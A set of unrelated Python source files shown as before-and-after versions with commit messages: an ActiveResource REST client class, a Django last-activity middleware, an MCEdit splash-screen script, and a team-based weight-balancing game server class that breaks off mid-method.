        return getattr(owner, self.class_method)
class ActiveResource(object):
"""Represents an activeresource object."""
__metaclass__ = ResourceMeta
_site = ''
_user = ''
_password = ''
_connection_obj = None
_headers = None
_timeout = 5
def __init__(self, attributes, prefix_options=None):
"""Initialize a new ActiveResource object.
Args:
attributes: A dictionary of attributes which represent this object.
prefix_options: A dict of prefixes to add to the request for
nested URLs.
"""
self.attributes = {}
if prefix_options:
self._prefix_options = prefix_options
else:
self._prefix_options = {}
self._update(attributes)
self._initialized = True
# Public class methods which act as factory functions
@classmethod
def find(cls, id_=None, from_=None, **kwargs):
"""Core method for finding resources.
Args:
id_: A specific resource to retrieve.
from_: The path that resources will be fetched from.
kwargs: any keyword arguments for query.
Returns:
An ActiveResource object.
Raises:
connection.Error: On any communications errors.
Error: On any other errors.
"""
if id_:
return cls._find_single(id_, **kwargs)
return cls._find_every(from_=from_, **kwargs)
@classmethod
def find_one(cls, from_, **kwargs):
"""Get a single resource from a specific URL.
Args:
from_: The path that resources will be fetched from.
kwargs: Any keyword arguments for query.
Returns:
An ActiveResource object.
Raises:
connection.Error: On any communications errors.
Error: On any other errors.
"""
return cls._find_one(from_, kwargs)
@classmethod
def exists(cls, id_, **kwargs):
"""Check whether a resource exists.
Args:
id_: The id or other key which specifies a unique object.
kwargs: Any keyword arguments for query.
Returns:
True if the resource is found, False otherwise.
"""
prefix_options, query_options = cls._split_options(kwargs)
path = cls._element_path(id_, prefix_options, query_options)
try:
_ = cls._connection().head(path, cls._headers)
return True
except connection.Error:
return False
# Non-public class methods to support the above
@classmethod
def _split_options(cls, options):
"""Split prefix options and query options.
Args:
options: A dictionary of prefix and/or query options.
Returns:
A tuple containing (prefix_options, query_options)
"""
#TODO(mrroach): figure out prefix_options
prefix_options = {}
query_options = {}
for key, value in options.items():
if key in cls._prefix_parameters():
prefix_options[key] = value
else:
query_options[key] = value
return [prefix_options, query_options]
@classmethod
def _find_single(cls, id_, **kwargs):
"""Get a single object from the default URL.
Args:
id_: The id or other key which specifies a unique object.
kwargs: Any keyword arguments for the query.
Returns:
An ActiveResource object.
Raises:
ConnectionError: On any error condition.
"""
prefix_options, query_options = cls._split_options(kwargs)
path = cls._element_path(id_, prefix_options, query_options)
return cls._build_object(cls._connection().get(path, cls._headers),
prefix_options)
@classmethod
def _find_one(cls, from_, query_options):
"""Find a single resource from a one-off URL.
Args:
from_: The path from which to retrieve the resource.
query_options: Any keyword arguments for the query.
Returns:
An ActiveResource object.
Raises:
connection.ConnectionError: On any error condition.
"""
#TODO(mrroach): allow from_ to be a string-generating function
path = from_ + cls._query_string(query_options)
return cls._build_object(cls._connection().get(path, cls._headers))
@classmethod
def _find_every(cls, from_=None, **kwargs):
"""Get all resources.
Args:
from_: (optional) The path from which to retrieve the resource.
kwargs: Any keyword arguments for the query.
Returns:
A list of resources.
"""
if from_:
path = from_ + cls._query_string(kwargs)
prefix_options = None
else:
prefix_options, query_options = cls._split_options(kwargs)
path = cls._collection_path(prefix_options, query_options)
return cls._build_list(cls._connection().get(path, cls._headers),
prefix_options)
@classmethod
def _build_object(cls, xml, prefix_options=None):
"""Create an object or objects for the given xml string.
Args:
xml: An xml string containing the object definition.
prefix_options: A dict of prefixes to add to the request for
nested URLs.
Returns:
An ActiveResource object.
"""
element_type, attributes = util.xml_to_dict(
xml, saveroot=True).items()[0]
return cls(attributes, prefix_options)
@classmethod
def _build_list(cls, xml, prefix_options=None):
"""Create a list of objects for the given xml string.
Args:
xml: An xml string containing multiple object definitions.
prefix_options: A dict of prefixes to add to the request for
nested URLs.
Returns:
A list of ActiveResource objects.
"""
resources = []
collection_type, elements = util.xml_to_dict(
xml, saveroot=True).items()[0]
for element in elements:
resources.append(cls(element, prefix_options))
return resources
@classmethod
def _query_string(cls, query_options):
"""Return a query string for the given options.
Args:
query_options: A dictionary of query keys/values.
Returns:
A string containing the encoded query.
"""
if query_options:
return '?' + urllib.urlencode(query_options)
else:
return ''
@classmethod
def _element_path(cls, id_, prefix_options=None, query_options=None):
"""Get the element path for the given id.
Examples:
Comment.element_path(1, {'post_id': 5}) -> /posts/5/act
Args:
id_: The id of the object to retrieve.
prefix_options: A dict of prefixes to add to the request for
nested URLs.
query_options: A dict of items to add to the query string for
the request.
Returns:
The path (relative to site) to the element formatted with the query.
"""
return '%(prefix)s/%(plural)s/%(id)s.%(format)s%(query)s' % {
'prefix': cls._prefix(prefix_options),
'plural': cls._plural,
'id': id_,
'format': 'xml',
'query': cls._query_string(query_options)}
@classmethod
def _collection_path(cls, prefix_options=None, query_options=None):
"""Get the collection path for this object type.
Examples:
Comment.collection_path() -> /comments.xml
Comment.collection_path(query_options={'active': 1})
-> /comments.xml?active=1
Comment.collection_path({'posts': 5})
-> /posts/5/comments.xml
Args:
prefix_options: A dict of prefixes to add to the request for
nested URLs
query_options: A dict of items to add to the query string for
the request.
Returns:
The path (relative to site) to this type of collection.
"""
return '%(prefix)s/%(plural)s.%(format)s%(query)s' % {
'prefix': cls._prefix(prefix_options),
'plural': cls._plural,
'format': 'xml',
'query': cls._query_string(query_options)}
@classmethod
def _custom_method_collection_url(cls, method_name, options):
prefix_options, query_options = cls._split_options(options)
path = (
'%(prefix)s/%(plural)s/%(method_name)s.%(format)s%(query)s' %
{'prefix': cls._prefix(prefix_options),
'plural': cls._plural,
'method_name': method_name,
'format': 'xml',
'query': cls._query_string(query_options)})
return path
@classmethod
def _class_get(cls, method_name, **kwargs):
"""Get a nested resource or resources.
Args:
method_name: the nested resource to retrieve.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = cls._custom_method_collection_url(method_name, kwargs)
return util.xml_to_dict(cls._connection().get(url, cls._headers))
@classmethod
def _class_post(cls, method_name, body='', **kwargs):
"""Get a nested resource or resources.
Args:
method_name: the nested resource to retrieve.
body: The data to send as the body of the request.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = cls._custom_method_collection_url(method_name, kwargs)
return cls._connection().post(url, cls._headers, body)
@classmethod
def _class_put(cls, method_name, body='', **kwargs):
"""Get a nested resource or resources.
Args:
method_name: the nested resource to retrieve.
body: The data to send as the body of the request.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = cls._custom_method_collection_url(method_name, kwargs)
return cls._connection().put(url, cls._headers, body)
@classmethod
def _class_delete(cls, method_name, **kwargs):
"""Get a nested resource or resources.
Args:
method_name: the nested resource to retrieve.
kwargs: Any keyword arguments for the query.
Returns:
A dictionary representing the returned data.
"""
url = cls._custom_method_collection_url(method_name, kwargs)
return cls._connection().delete(url, cls._headers)
    @classmethod
    def _prefix_parameters(cls):
        """Return the set of named parameters used in the site prefix.
        e.g. /objects/$object_id would yield set(['object_id'])
             /objects/${object_id}/people/$person_id/ would yield
             set(['object_id', 'person_id'])
        Args:
            None
        Returns:
            A set of named parameters.
        """
        path = urlparse.urlsplit(cls._site)[2]
        template = Template(path)
        keys = set()
        # Template.pattern matches both $name ('named' group) and ${name}
        # ('braced' group); collect whichever form each match used.
        for match in template.pattern.finditer(path):
            for match_type in 'braced', 'named':
                if match.groupdict()[match_type]:
                    keys.add(match.groupdict()[match_type])
        return keys
@classmethod
def _prefix(cls, options=None):
"""Return the prefix for this object type.
Args:
options: A dictionary containing additional prefixes to prepend.
Returns:
A string containing the path to this element.
"""
path = re.sub('/$', '', urlparse.urlsplit(cls._site)[2])
template = Template(path)
keys = cls._prefix_parameters()
options = dict([(k, options.get(k, '')) for k in keys])
return template.safe_substitute(options)
    @classmethod
    def _connection(cls):
        """Return a connection object which handles HTTP requests."""
        # Lazily create a single Connection per class and cache it.
        if not cls._connection_obj:
            cls._connection_obj = connection.Connection(
                cls._site, cls._user, cls._password, cls._timeout)
        return cls._connection_obj

    @classmethod
    def _scrub_name(cls, name):
        """Remove invalid characters from attribute names.
        Args:
            name: the string to scrub
        Returns:
            The part of the string that is a valid name, or None if unscrubbable
        """
        # Lower-case and turn XML-style dashes into underscores first.
        name = name.lower().replace('-', '_')
        match = VALID_NAME.search(name)
        if match:
            return match.group(0)
        return None
    # Public instance methods
    def to_dict(self):
        """Convert the object (recursively) to a dictionary."""
        values = {}
        # NOTE: iteritems() is Python 2 only.
        for key, value in self.attributes.iteritems():
            if isinstance(value, list):
                # Nested collection: convert each child resource.
                values[key] = [i.to_dict() for i in value]
            elif isinstance(value, ActiveResource):
                values[key] = value.to_dict()
            else:
                values[key] = value
        return values

    def to_xml(self, root=None, header=True, pretty=False):
        """Convert the object to an xml string.
        Args:
            root: The name of the root element for xml output; defaults to
                this resource's singular name.
            header: Whether to include the xml header.
            pretty: Whether to pretty-print the xml output.
        Returns:
            An xml string.
        """
        if not root:
            root = self._singular
        return util.to_xml(self.to_dict(), root=root,
                           header=header, pretty=pretty)
    def save(self):
        """Save (create or update) the object on the remote service.
        Args:
            None
        Returns:
            The connection response, or None when the response body could
            not be parsed as XML.
        Raises:
            connection.Error: On any communications problems.
        """
        # An existing id means the resource exists remotely -> PUT (update);
        # otherwise POST (create) to the collection path.
        if self.id:
            response = self._connection().put(
                self._element_path(self.id, self._prefix_options),
                self._headers,
                data=self.to_xml())
        else:
            response = self._connection().post(
                self._collection_path(self._prefix_options),
                self._headers,
                data=self.to_xml())
        try:
            attributes = util.xml_to_dict(response)
        except Error:
            # Unparseable body: keep the local attributes unchanged.
            return
        self._update(attributes)
        return response

    def destroy(self):
        """Deletes the resource from the remote service.
        Args:
            None
        Returns:
            None
        """
        self._connection().delete(
            self._element_path(self.id, self._prefix_options),
            self.__class__._headers)
def __getattr__(self, name):
"""Retrieve the requested attribute if it exists.
Args:
name: The attribute name.
Returns:
The attribute's value.
Raises:
AttributeError: if no such attribute exists.
"""
#TODO(mrroach): Use descriptors instead of __getattr__
if name == 'id':
# id should always be getattrable
return self.attributes.get('id')
if name in self.attributes:
return self.attributes[name]
raise AttributeError(name)
    def __setattr__(self, name, value):
        """Set the named attributes.
        Args:
            name: The attribute name.
            value: The attribute's value.
        Returns:
            None
        """
        # Before _initialized is set (i.e. during __init__), only the
        # final object.__setattr__ below runs.
        if '_initialized' in self.__dict__:
            if name in self.__dict__ or name in self.__class__.__dict__:
                # Update a normal attribute
                object.__setattr__(self, name, value)
            else:
                # Add/update an attribute
                self.attributes[name] = value
        # NOTE(review): this runs unconditionally, so values routed into
        # self.attributes above are also set as real instance attributes
        # (which then shadow __getattr__) -- confirm this is intended.
        object.__setattr__(self, name, value)

    def __repr__(self):
        # e.g. "person(42)"
        return '%s(%s)' % (self._singular, self.id)

    def __cmp__(self, other):
        # Python 2 comparison hook: order resources by id; comparison with
        # a non-resource compares our id against the raw value.
        if isinstance(other, self.__class__):
            return cmp(self.id, other.id)
        else:
            return cmp(self.id, other)
def _update(self, attributes):
"""Update the object with the given attributes.
Args:
attributes: A dictionary of attributes.
Returns:
None
"""
self.attributes = {}
# Add all the tags in the element as attributes
for key, value in attributes.items():
if isinstance(value, dict):
klass = self._find_class_for(key)
attr = klass(value)
elif isinstance(value, list):
klass = self._find_class_for(util.singularize(key))
attr = [klass(child) for child in value]
else:
attr = value
# Store the actual value in the attributes dictionary
self.attributes[key] = attr
attr_name = self._scrub_name(key)
    def _find_class_for(self, element_name=None, class_name=None):
        """Look in the parent modules for classes matching the element name.
        One, or both of element/class name must be specified.
        Args:
            element_name: The name of the element type.
            class_name: The class name of the element type.
        Returns:
            A Resource class.
        """
        if not element_name and not class_name:
            raise Error('One of element_name,class_name must be specified.')
        elif not element_name:
            element_name = util.underscore(class_name)
        elif not class_name:
            class_name = util.camelize(element_name)
        # Walk from the deepest enclosing package up to the top-level one,
        # trying module.ClassName first, then module.element_name.ClassName.
        module_path = self.__module__.split('.')
        for depth in range(len(module_path), 0, -1):
            try:
                __import__('.'.join(module_path[:depth]))
                module = sys.modules['.'.join(module_path[:depth])]
            except ImportError:
                continue
            try:
                klass = getattr(module, class_name)
                return klass
            except AttributeError:
                try:
                    __import__('.'.join([module.__name__, element_name]))
                    submodule = sys.modules['.'.join([module.__name__,
                                                      element_name])]
                except ImportError:
                    continue
                try:
                    klass = getattr(submodule, class_name)
                    return klass
                except AttributeError:
                    continue
        # If we made it this far, no such class was found: synthesize a
        # subclass of our own type.  NOTE: new.classobj is Python 2 only.
        return new.classobj(class_name, (self.__class__,),
                            {'__module__': self.__module__})
    # methods corresponding to Ruby's custom_methods
    def _custom_method_element_url(self, method_name, options):
        """Build the URL for a custom method on an existing element.

        Args:
            method_name: the custom method name (final path component).
            options: prefix/query options; the instance's stored prefix
                options take precedence after the update() below.
        Returns:
            The relative URL path string, including any query string.
        """
        prefix_options, query_options = self._split_options(options)
        prefix_options.update(self._prefix_options)
        path = (
            '%(prefix)s/%(plural)s/%(id)s/%(method_name)s.%(format)s%(query)s' %
            {'prefix': self._prefix(prefix_options),
             'plural': self._plural,
             'id': self.id,
             'method_name': method_name,
             'format': 'xml',
             'query': self._query_string(query_options)})
        return path

    def _custom_method_new_element_url(self, method_name, options):
        """Build the URL for a custom method on a not-yet-saved element.

        Same as _custom_method_element_url but uses the literal path
        segment 'new' in place of an id.
        """
        prefix_options, query_options = self._split_options(options)
        prefix_options.update(self._prefix_options)
        path = (
            '%(prefix)s/%(plural)s/new/%(method_name)s.%(format)s%(query)s' %
            {'prefix': self._prefix(prefix_options),
             'plural': self._plural,
             'method_name': method_name,
             'format': 'xml',
             'query': self._query_string(query_options)})
        return path
    def _instance_get(self, method_name, **kwargs):
        """Get a nested resource or resources.
        Args:
            method_name: the nested resource to retrieve.
            kwargs: Any keyword arguments for the query.
        Returns:
            A dictionary representing the returned data.
        """
        url = self._custom_method_element_url(method_name, kwargs)
        data = util.xml_to_dict(self._connection().get(url, self._headers),
                                saveroot=True)
        # Unwrap a single-rooted document down to its payload.
        # NOTE(review): data.values()[0] relies on Python 2's list-returning
        # dict.values(); Python 3 would need list(data.values())[0].
        if isinstance(data, dict) and len(data.keys()) == 1:
            return data.values()[0]
        else:
            return data

    def _instance_post(self, method_name, body='', **kwargs):
        """Create a new resource/nested resource.
        Args:
            method_name: the nested resource to post to.
            body: The data to send as the body of the request.
            kwargs: Any keyword arguments for the query.
        Returns:
            The raw connection response.
        """
        if self.id:
            url = self._custom_method_element_url(method_name, kwargs)
        else:
            # Unsaved resource: POST to the /new/ URL, defaulting the body
            # to this object's XML representation.
            if not body:
                body = self.to_xml()
            url = self._custom_method_new_element_url(method_name, kwargs)
        return self._connection().post(url, self._headers, body)

    def _instance_put(self, method_name, body='', **kwargs):
        """Update a nested resource.
        Args:
            method_name: the nested resource to update.
            body: The data to send as the body of the request.
            kwargs: Any keyword arguments for the query.
        Returns:
            The raw connection response.
        """
        url = self._custom_method_element_url(method_name, kwargs)
        return self._connection().put(url, self._headers, body)

    def _instance_delete(self, method_name, **kwargs):
        """Delete a nested resource or resources.
        Args:
            method_name: the nested resource to delete.
            kwargs: Any keyword arguments for the query.
        Returns:
            The raw connection response.
        """
        url = self._custom_method_element_url(method_name, kwargs)
        return self._connection().delete(url, self._headers)
# Create property which returns class/instance method based on context
get = ClassAndInstanceMethod('_class_get', '_instance_get')
post = ClassAndInstanceMethod('_class_post', '_instance_post')
put = ClassAndInstanceMethod('_class_put', '_instance_put')
delete = ClassAndInstanceMethod('_class_delete', '_instance_delete')
|
"""
Middleware for the user accounts app.
"""
from django.utils import timezone
class LastActivityDateUpdateMiddleware(object):
    """
    Middleware for updating the "last activity date" of authenticated users.
    """

    def process_request(self, request):
        """
        Process the request, update the last activity date of current user.
        :param request: The incoming request
        :return: None
        """
        # Only handle authenticated users
        current_user = request.user
        if current_user.is_authenticated():
            # Stamp the profile's last activity timestamp.  (The previous
            # comment here said "last login IP address", which was wrong.)
            # NOTE(review): is_authenticated is *called* -- pre-Django-1.10
            # style; in 1.10+ it is a property.  Confirm target version.
            user_profile = current_user.user_profile
            user_profile.last_activity_date = timezone.now()
            user_profile.save_no_rendering(update_fields=('last_activity_date',))
Update docstring and add fixme for future revision
"""
Middleware for the user accounts app.
"""
from django.utils import timezone
class LastActivityDateUpdateMiddleware(object):
    """
    Middleware for updating the "last activity date" of authenticated users.
    """

    def process_request(self, request):
        """
        Process the request, update the last activity date of current user if logged-in.
        :param request: The current request instance.
        """
        user = request.user
        # Anonymous visitors have no profile to stamp.
        if not user.is_authenticated():
            return
        # FIXME This generate two SQL requests per view. Maybe use update_or_create instead?
        profile = user.user_profile
        profile.last_activity_date = timezone.now()
        profile.save_no_rendering(update_fields=('last_activity_date',))
|
#! /usr/bin/env python
# Taken from http://www.pygame.org/project-Splash+screen-1186-.html by Rock Achu (rockhachu2)
# and tweaked ;)
# Shows a splash window while MCEdit loads.  Python 2 script (print
# statement and `except Exception, e` syntax).
import os
import directories

if os.sys.platform == 'linux2':
    os.sys.path.insert(1, os.path.expanduser('~/.local/lib/python2.7/site-packages'))
os.sys.path.insert(1, os.path.abspath('./lib'))
import pygame

print 'Splash load...'
# Center the splash window before the display is created.
os.environ['SDL_VIDEO_CENTERED'] = '1'
pygame.init()
pygame.font.init()
no_splash = False
cur_dir = directories.getDataDir()
# The 'splash' file holds the path of the image to show on this startup.
splash_name = os.path.join(cur_dir, 'splash')
splash = None
try:
    found = False
    if os.path.exists(splash_name):
        splash_img = open(splash_name).read().strip()
        if os.path.exists(splash_img) and splash_img.split('.')[-1].lower() in ('jpg', 'png', 'bmp', 'pcx', 'tif', 'lbm', 'pbm', 'pgm', 'ppm', 'xpm'):
            found = True
            splash = pygame.image.load(open(splash_img, 'rb'))
    if not found:
        # Fall back to the bundled default image.
        splash = pygame.image.load(open(os.path.join(cur_dir, "splash.png"), 'rb'))
    screen = pygame.display.set_mode(splash.get_size(), pygame.NOFRAME)
    screen.blit(splash, (0, 0))
except Exception, e:
    print e
    # No usable image: render a plain text banner instead.
    try:
        f = open(os.path.join(cur_dir, 'fonts', 'DejaVuSans-Bold.ttf'), 'rb')
        font = pygame.font.Font(f, 48)
        buf = font.render("MCEDit is loading...", True, (128, 128, 128))
        screen = pygame.display.set_mode((buf.get_width() + 20, buf.get_height() + 20), pygame.NOFRAME)
        screen.blit(buf, (10, 10))
        splash = pygame.display.get_surface()
    except Exception, _e:
        print _e
        # Last resort: a 1x1 window, i.e. effectively no splash.
        splash = pygame.display.set_mode((1, 1))
        no_splash = True
if splash:
    pygame.display.update()
#os.environ['SDL_VIDEO_CENTERED'] = '0' # Done later, when initializing MCEdit 'real' display.

# Random splash
#
# Uses a 'splash' file to check the state.
# This file contains the name of the splash to be loaded next time MCEdit starts.
# No splash file means it has to be created.
# An empty file means the 'splash.png' file will always be used.
#
if not os.path.exists(splash_name):
    open(splash_name, 'w').write('scrap')
if len(open(splash_name).read()) > 0:
    from random import choice
    splashes_folder = os.path.join(cur_dir, 'splashes')
    if not os.path.exists(splashes_folder):
        # NOTE(review): joining cur_dir with an already-absolute
        # splashes_folder is a no-op for os.path.join -- confirm intent.
        splashes_folder = os.path.join(cur_dir, splashes_folder)
    if os.path.exists(splashes_folder) and os.listdir(splashes_folder):
        new_splash = choice(os.listdir(splashes_folder))
        if new_splash.split('.')[-1].lower() in ('jpg', 'png', 'bmp', 'pcx', 'tif', 'lbm', 'pbm', 'pgm', 'ppm', 'xpm'):
            # Record the image to use on the *next* startup.
            open(splash_name, 'w').write(os.path.join(cur_dir, splashes_folder, new_splash))
Added exception handling to writing of the splash file
#! /usr/bin/env python
# Taken from http://www.pygame.org/project-Splash+screen-1186-.html by Rock Achu (rockhachu2)
# and tweaked ;)
import os
import directories
if os.sys.platform == 'linux2':
os.sys.path.insert(1, os.path.expanduser('~/.local/lib/python2.7/site-packages'))
os.sys.path.insert(1, os.path.abspath('./lib'))
import pygame
print 'Splash load...'
os.environ['SDL_VIDEO_CENTERED'] = '1'
pygame.init()
pygame.font.init()
no_splash = False
cur_dir = directories.getDataDir()
splash_name = os.path.join(cur_dir, 'splash')
splash = None
try:
found = False
if os.path.exists(splash_name):
splash_img = open(splash_name).read().strip()
if os.path.exists(splash_img) and splash_img.split('.')[-1].lower() in ('jpg', 'png', 'bmp', 'pcx', 'tif', 'lbm', 'pbm', 'pgm', 'ppm', 'xpm'):
found = True
splash = pygame.image.load(open(splash_img, 'rb'))
if not found:
splash = pygame.image.load(open(os.path.join(cur_dir, "splash.png"), 'rb'))
screen = pygame.display.set_mode(splash.get_size(), pygame.NOFRAME)
screen.blit(splash, (0, 0))
except Exception, e:
print e
try:
f = open(os.path.join(cur_dir, 'fonts', 'DejaVuSans-Bold.ttf'), 'rb')
font = pygame.font.Font(f, 48)
buf = font.render("MCEDit is loading...", True, (128, 128, 128))
screen = pygame.display.set_mode((buf.get_width() + 20, buf.get_height() + 20), pygame.NOFRAME)
screen.blit(buf, (10, 10))
splash = pygame.display.get_surface()
except Exception, _e:
print _e
splash = pygame.display.set_mode((1, 1))
no_splash = True
if splash:
pygame.display.update()
#os.environ['SDL_VIDEO_CENTERED'] = '0' # Done later, when initializing MCEdit 'real' display.
# Random splash
#
# Uses a 'splash' file to check the state.
# This file contains the name of the splash to be loaded next time MCEdit starts.
# No splash file means it has to be created.
# An empty file means the 'splash.png' file will always be used.
#
if not os.path.exists(splash_name):
try:
open(splash_name, 'w').write('scrap')
except:
pass
if len(open(splash_name).read()) > 0:
from random import choice
splashes_folder = os.path.join(cur_dir, 'splashes')
if not os.path.exists(splashes_folder):
splashes_folder = os.path.join(cur_dir, splashes_folder)
if os.path.exists(splashes_folder) and os.listdir(splashes_folder):
new_splash = choice(os.listdir(splashes_folder))
if new_splash.split('.')[-1].lower() in ('jpg', 'png', 'bmp', 'pcx', 'tif', 'lbm', 'pbm', 'pgm', 'ppm', 'xpm'):
try:
open(splash_name, 'w').write(os.path.join(cur_dir, splashes_folder, new_splash))
except:
pass
|
#!/usr/bin/python3
from Games.Game import Game
import time
import random
from math import ceil, floor;
from Team import Team
import os.path
if __name__ == "__main__":
raise Exception("You cannot run this file directly")
class game(Game):
    def __init__(self, players):
        # Directory of this module; used by the base class load() call.
        self.filename = os.path.dirname(os.path.realpath(__file__));
        self.load()
        self.players = players
        self.teams = []
        # playable: a round is currently in progress;
        # started: start() has run at least once;
        # winner: falsy until checkWinStatement() records a team name.
        self.playable = False
        self.started = False
        self.winner = False
def addPlayer(self, player):
self.players.append(player)
return self
    def doAction(self, data):
        """Dispatch one client message.

        `data` must carry 'action' and the sender's 'id'.  Returns False on
        malformed input or an unknown player; True once processed.
        """
        print(self.players)
        try:
            action = data['action']
        except KeyError:
            return False
        try:
            player = self.getPlayerById(data['id'])
            print(player)
        except KeyError:
            return False
        if not player:
            return False
        update = False
        if action == 'move':
            # Move a weight between 'available' and the 'left'/'right' pans.
            args = {}
            try:
                args['from'] = data['from']
            except KeyError:
                return False
            try:
                args['to'] = data['to']
            except KeyError:
                return False
            try:
                args['weight'] = data['weight']
            except KeyError:
                return False
            if args['from'] == 'available':
                if args['to'] == 'left' or args['to'] == 'right':
                    if self.moveValueToWeight(player, args['weight'], player.data['dataGame'][args['to']]):
                        data['action'] = 'move_accepted';
                        player.sendMessage(data)
                        return True
            elif args['from'] == 'left' or args['from'] == 'right':
                if args['to'] == 'available':
                    if self.moveValueFromWeight(player, args['weight'], player.data['dataGame'][args['from']]):
                        data['action'] = 'move_accepted';
                        player.sendMessage(data)
                        update = True
                else:
                    if self.moveValueBetweenWeights(player, player.data['dataGame'][args['from']], player.data['dataGame'][args['to']], args['weight']):
                        data['action'] = 'move_accepted';
                        player.sendMessage(data)
                        update = True
        elif action == 'proposition':
            # Offer a weight to another player.
            args = {}
            try:
                args['from'] = data['from']
            except KeyError:
                return False
            try:
                args['to'] = self.getPlayerById(data['to'])
            except KeyError:
                return False
            try:
                args['weight'] = data['weight']
            except KeyError:
                return False
            if args['from'] == 'left' or args['from'] == 'right':
                # Take the weight off the pan before offering it.
                # NOTE(review): verify moveValueFromWeight's return value
                # actually supports this truthiness failure check.
                if not self.moveValueFromWeight(player, args['weight'], player.data['dataGame'][args['from']]):
                    return False
            if self.setProposition(player, args['to'], args['weight']):
                data['action'] = 'proposition_accepted'
                player.sendMessage(data)
                update = True
        elif action == "start":
            if not self.playable:
                self.start()
                # Push the fresh per-player state to every client.
                for player in self.players:
                    player.sendMessage({
                        "action": "updateStatus",
                        "gameStatus": "playable",
                        "playerData": self.getPlayerUpdate(player)
                    })
                update = True
        if update:
            # After any state change, see whether a team has just won.
            if self.checkWinStatement():
                for player in self.players:
                    player.sendMessage({
                        "gameStatus": "end",
                        "action": "updateStatus",
                        "winner": self.winner
                    })
        return True
"""
try:
value = data['value']
except KeyError:
value = False
default = {
"action": "none"
}
if not self.playable:
if not self.started:
pass
else:
if player:
player.sendMessage({
"gameStatus": "end",
"action": "updateStatus",
"winner": self.winner,
})
update = True
elif data['action'] == "moveValueToWeight":
try:
weight = data['weight']
if int(weight) == 0:
weight = self.player.data['dataGame']['left']
else:
weight = self.player.data['dataGame']['right']
except KeyError:
weight = False
if weight and player and value:
data['success'] = self.moveValueToWeight(player, value, weight)
else:
data['success'] = False
data['playerData'] = self.getPlayerUpdate(player)
if player:
player.sendMessage(data)
update = True
elif data['action'] == "moveValueFromWeight":
try:
weight = data['weight']
if int(weight) == 0:
weight = self.player.data['dataGame']['propositions']['left']
else:
weight = self.player.data['dataGame']['propositions']['left']
except KeyError:
weight = False
if weight and player and value:
data['success'] = self.moveValueFromWeight(player, value, weight)
else:
data['success'] = False
data['playerData'] = self.getPlayerUpdate(player)
if player:
player.sendMessage(data)
update = True
elif data['action'] == "setProposition":
try:
playerTo = self.getPlayerById(data['to'])
except KeyError:
playerTo = False
if playerTo and player and value:
data['success'] = self.setProposition(player, playerTo, value)
else:
data['success'] = False
if player and playerTo:
data['playerData'] = self.getPlayerUpdate(player)
player.sendMessage(data)
data['action'] = "update"
data['playerData'] = self.getPlayerUpdate(playerTo)
playerTo.sendMessage(data)
update = True
elif data['action'] == "removeProposition":
try:
playerTo = self.getPlayerById(data['to'])
except KeyError:
playerTo = False
if playerTo and player:
data['success'] = self.removeProposition(player, playerTo)
else:
data['success'] = False
if player and playerTo:
data['playerData'] = self.getPlayerUpdate(player)
player.sendMessage(data)
data['action'] = "update"
data['playerData'] = self.getPlayerUpdate(playerTo)
playerTo.sendMessage(data)
update = True
if update:
if self.checkWinStatement():
for player in self.players:
player.sendMessage({
"gameStatus": "end",
"action": "updateStatus",
"winner": self.winner
})
return True
return False
"""
    def start(self):
        """Begin a new round: build teams, deal values, reset win state."""
        self.prepareTeams()
        self.preparePlayers()
        self.winner = False
        self.playable = True
        self.started = True
        return self
def prepareTeams(self, teamNumber = 2):
random.shuffle(self.players)
for i in range(teamNumber):
self.teams.append(Team())
counter = 0
for player in self.players:
self.teams[counter % teamNumber].addPlayer(player)
counter = counter + 1;
return self
    def preparePlayers(self):
        """Deal starting values to every player, one team at a time.

        Each player gets a random target ('summary'); the team's generated
        values are pooled, shuffled, and dealt back out 'count' per player.
        """
        for team in self.teams:
            values = []
            for player in team.players:
                player.data['dataGame'] = {"summary": random.randint(5,15), "propositions": {"from": {}, "to": {}}, "left": [], "right": []}
                # Two batches of random parts, each summing to 'summary'.
                tmp = self.randomizeValues(player.data['dataGame']['summary']) + self.randomizeValues(player.data['dataGame']['summary'])
                player.data['dataGame']['count'] = len(tmp)
                values = values + tmp
            random.shuffle(values)
            # Redistribute the shuffled pool within the team.
            for player in team.players:
                player.data['dataGame']['available'] = values[0:player.data['dataGame']['count']]
                values = values[player.data['dataGame']['count']:]
            # Debug output of the dealt hands.
            for player in team.players:
                print([player.nick, player.data, player.team.id])
        return self
def moveValueToWeight(self, player, value, weight):
try:
index = player.data['dataGame']['available'].index(value)
val = player.data['dataGame']['available'][index]
weight.append(val)
del player.data['dataGame']['available'][index]
return True
except ValueError:
return False
def moveValueFromWeight(self, player, value, weight):
try:
index = weight.index(value)
val = weight[index]
player.data['dataGame']['available'].append(val)
del weight[index]
return self
except ValueError:
return self
def moveValueBetweenWeights(self, player, From, To, weight):
try:
indexFrom = From.index(weight)
val = From[indexFrom]
To.append(val)
del From[indexFrom]
return True
except ValueError:
return False
    def setProposition(self, playerFrom, playerTo, value):
        """Offer *value* from playerFrom to playerTo.

        Returns False if an offer in this direction is already pending or
        if *value* is not in playerFrom's available pool.  If playerTo has
        a counter-offer pending toward playerFrom, both offers are settled
        immediately as a swap.
        """
        #print(self.checkWinStatement())
        try:
            # Probe for an existing pending offer; KeyError means none.
            tmp = playerFrom.data['dataGame']['propositions']['to'][playerTo] or playerTo.data['dataGame']['propositions']['from'][playerFrom]
            return False
        except KeyError:
            try:
                index = playerFrom.data['dataGame']['available'].index(value)
                # Record the offer on both players.
                playerFrom.data['dataGame']['propositions']['to'][playerTo] = playerFrom.data['dataGame']['available'][index]
                playerTo.data['dataGame']['propositions']['from'][playerFrom] = playerFrom.data['dataGame']['available'][index]
                del playerFrom.data['dataGame']['available'][index];
                try:
                    # Reciprocal offer exists: execute the trade now, each
                    # side receiving the other's offered value.
                    valueToPlayerFrom = playerTo.data['dataGame']['propositions']['to'][playerFrom]
                    valueToPlayerTo = playerFrom.data['dataGame']['propositions']['to'][playerTo]
                    playerTo.data['dataGame']['available'].append(valueToPlayerTo)
                    playerFrom.data['dataGame']['available'].append(valueToPlayerFrom)
                    del playerTo.data['dataGame']['propositions']['to'][playerFrom]
                    del playerTo.data['dataGame']['propositions']['from'][playerFrom]
                    del playerFrom.data['dataGame']['propositions']['to'][playerTo]
                    del playerFrom.data['dataGame']['propositions']['from'][playerTo]
                    return True
                except KeyError:
                    # No counter-offer yet; leave this one pending.
                    pass
                return True
            except ValueError:
                # *value* was not found in the available pool.
                return False
    def removeProposition(self, playerFrom, playerTo):
        """Cancel a pending offer from playerFrom to playerTo.

